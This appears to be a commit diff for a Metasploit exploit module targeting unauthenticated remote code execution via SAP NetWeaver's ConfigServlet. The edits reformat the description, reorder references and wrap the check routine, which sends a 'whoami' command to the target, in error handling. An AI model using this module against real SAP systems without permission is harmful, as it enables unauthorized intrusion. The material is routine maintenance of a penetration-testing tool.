@@ -18,9 +18,9 @@ def initialize(info = {})
18
18
super ( update_info ( info ,
19
19
'Name' => 'SAP ConfigServlet Remote Code Execution' ,
20
20
'Description' => %q{
21
- This module allows remote code execution via operating system commands through
22
- the SAP ConfigServlet without any authentication.
23
- This module has been tested successfully with SAP NetWeaver 7.00 and 7.01 on Windows Server 2008 R2
21
+ This module allows remote code execution via operating system commands through the
22
+ SAP ConfigServlet without any authentication. This module has been tested successfully
23
+ with SAP NetWeaver 7.00 and 7.01 on Windows Server 2008 R2.
24
24
} ,
25
25
'Author' =>
26
26
[
@@ -30,9 +30,9 @@ def initialize(info = {})
30
30
'License' => MSF_LICENSE ,
31
31
'References' =>
32
32
[
33
- [ 'URL' , 'http://erpscan.com/wp-content/uploads/2012/11/Breaking-SAP-Portal-HackerHalted-2012.pdf' ] ,
34
33
[ 'OSVDB' , '92704' ] ,
35
- [ 'EDB' , '24996' ]
34
+ [ 'EDB' , '24996' ] ,
35
+ [ 'URL' , 'http://erpscan.com/wp-content/uploads/2012/11/Breaking-SAP-Portal-HackerHalted-2012.pdf' ]
36
36
] ,
37
37
'DisclosureDate' => 'Nov 01 2012' , # Based on the reference presentation
38
38
'Platform' => 'win' ,
@@ -63,7 +63,11 @@ def initialize(info = {})
63
63
64
64
def check
65
65
uri = normalize_uri ( target_uri . path , 'ConfigServlet' )
66
- res = send_evil_request ( uri , "whoami" , 20 )
66
+ begin
67
+ res = send_evil_request ( uri , "whoami" , 20 )
68
+ rescue
69
+ Exploit ::CheckCode ::Unknown
70
+ end
67
71
if !res
68
72
Exploit ::CheckCode ::Unknown
69
73
elsif res . body . include? ( "Process created" )
0 commit comments